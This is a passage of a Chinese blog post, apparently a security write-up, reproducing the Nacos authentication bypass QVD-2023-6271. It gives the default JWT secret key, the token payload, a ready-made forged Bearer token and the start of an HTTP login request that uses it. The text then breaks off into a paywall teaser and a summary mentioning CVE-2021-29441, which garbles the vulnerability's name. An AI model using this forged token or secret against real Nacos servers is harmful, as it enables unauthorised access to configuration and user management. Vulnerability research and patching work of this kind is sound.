本文主要复现nacos的一些经典漏洞,既是分享也是为了记录自己的成长,近期会持续更新。
1. QVD-2023-6271 Nacos身份绕过漏洞
1.1 漏洞级别 :高危
1.2 漏洞描述:低版本的Nacos存在默认的scertkey在未更换的情况下可以生成任意的可用accesstoken
1.3利用范围
nacos <=2.2.0
1.4 漏洞复现
先来重点介绍一下如何任意生成一个可用的accesstoken
在nacos中accesstoken的生成是通过jwt的字符串创建的。
在nacos中默认的secertkey为:
SecretKey012345678901234567890123456789012345678901234567890123456789
jwt的payload参数为
{
"sub": "nacos",
"exp": 1699974368
}
#其中exp为时间戳,实际测试中这个时间戳早于或晚于当前时间都可以生效,如果无效的话可以调整时间戳到当前时间以后
至此一份完整的jwt生成数据就形成了
注:请注意红框部分的secret base64 encoded 必须勾选,否则生成的encoded就是错误的,笔者在此踩过雷。
至此万能accesstoken就生成了,实际测试一下:
在login接口的header添加下列参数
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzI5N30.YC6gtGxpYNDrSvNzmu2S4YF5Hd1Xwj1AJx5ZrdizO2A
一个完整的request包如下:(username和password可以随意填写)
POST /nacos/v1/auth/users/login HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/
Nacos安全漏洞分析:身份绕过与未授权访问

文章详细描述了Nacos中的两个高危漏洞:1.1.6271版本的身份绕过漏洞利用JWT生成任意accesstoken,以及CVE-2021-29441的未授权访问漏洞。作者提供了漏洞复现步骤和利用方法,包括创建用户和修改密码等API操作。
最低0.47元/天 解锁文章

被折叠的 条评论
为什么被折叠?



